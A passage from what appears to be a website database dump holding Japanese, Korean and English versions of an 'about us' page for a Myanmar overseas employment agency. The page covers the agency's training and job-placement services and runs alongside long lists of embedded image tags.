src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 274, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_1.jpg\" data-align=\"center\" data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_0.jpg\" data-align=\"center\" data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\" data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_0.jpg\" data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_0.jpg\" data-align=\"center\" data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-10_0.jpg\" data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_0.jpg\" data-align=\"center\" data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12_0.jpg\" data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\" data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\" data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_0.jpg\" data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_0.jpg\" data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_0.jpg\" data-align=\"center\" data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35_0.jpg\" data-align=\"center\" data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36_0.jpg\" data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-37_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-38_0.jpg\" data-align=\"center\" data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\" data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_0.jpg\">', '', 'full_html'),
('page', 0, 23, 274, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\" data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\" data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\" data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\" data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\" data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\" data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\" data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\" data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_1.jpg\" alt=\"\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\" data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\" data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\" data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\" data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\" data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\" data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\" data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\" data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38_1.jpg\" data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\" data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_1.jpg\" data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\"><img data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41_1.jpg\">', '', 'full_html'),
('page', 0, 23, 275, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\" data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" 